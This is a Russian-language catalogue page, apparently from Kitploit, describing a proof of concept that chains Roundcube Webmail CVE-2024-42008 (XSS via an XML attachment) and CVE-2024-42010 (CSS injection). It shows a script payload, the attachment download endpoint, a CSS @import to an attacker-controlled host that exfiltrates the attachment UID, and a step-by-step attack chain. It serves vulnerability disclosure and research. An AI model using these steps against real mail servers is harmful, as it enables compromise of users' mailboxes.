Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC — POC for Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010 | Kitploit
Инструменты/GitHubGitHub/victoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityEmail Security
GitHubvictoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc

Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC

POC for Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
21 год назадЕщё не проверено

Доказательство концепции: CVE-2024-42008 и CVE-2024-42010

Это доказательство концепции (PoC) демонстрирует эксплуатацию двух уязвимостей в Roundcube Webmail, которые позволяют внедрение CSS и межсайтовый скриптинг (XSS). Атака состоит из двух этапов:

  1. XSS через вредоносное XML-вложение (CVE-2024-42008)

    Из-за недостаточных проверок загрузки файлов XML-файл может быть отправлен в качестве вложения с кодом JavaScript, например:

    root@kitploit:~
    <something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
    	alert(origin)
    </something:script>
    

    Это была известная проблема, отслеживаемая как CVE-2020-13965, и мерой по смягчению было отключение опции «Открыть вложение». Но файл по-прежнему можно получить через конечную точку

    root@kitploit:~
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    

    Где UID — это уникальный идентификатор для данного конкретного вложения в данном почтовом ящике (т.е. INBOX).

  2. HTML-эксфильтрация через внедрение CSS (CVE-2024-42010)

    При отправке электронного письма можно внедрить собственный CSS-файл, если он размещён в домене, начинающемся с a. Используя это и JavaScript-серверный файл, обрабатывающий запросы от уязвимого хоста Roundcube, можно извлечь UID вредоносного XSS-вложения.

    Импортируйте CSS в отправленном письме с помощью

    root@kitploit:~
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    

    Разместите JS-сервер (roundcube-css-exploit.js), который извлекает UID вредоносного вложения

Цепочка атаки

  1. Разместите на своём домене JavaScript-сервер
  2. Отправьте электронное письмо с вредоносным XML-вложением и импортируйте CSS со своего домена
  3. Жертва открывает письмо, и UID извлекается
  4. Затем, в зависимости от предпочтительного способа доставки XSS, вы можете либо отправить второе письмо со ссылкой на вложение, либо перенаправить пользователя через него.

Источник: Правительственные письма под угрозой: критическая уязвимость межсайтового скриптинга в Roundcube Webmail (Команда исследования уязвимостей Sonar)

Скачать инструмент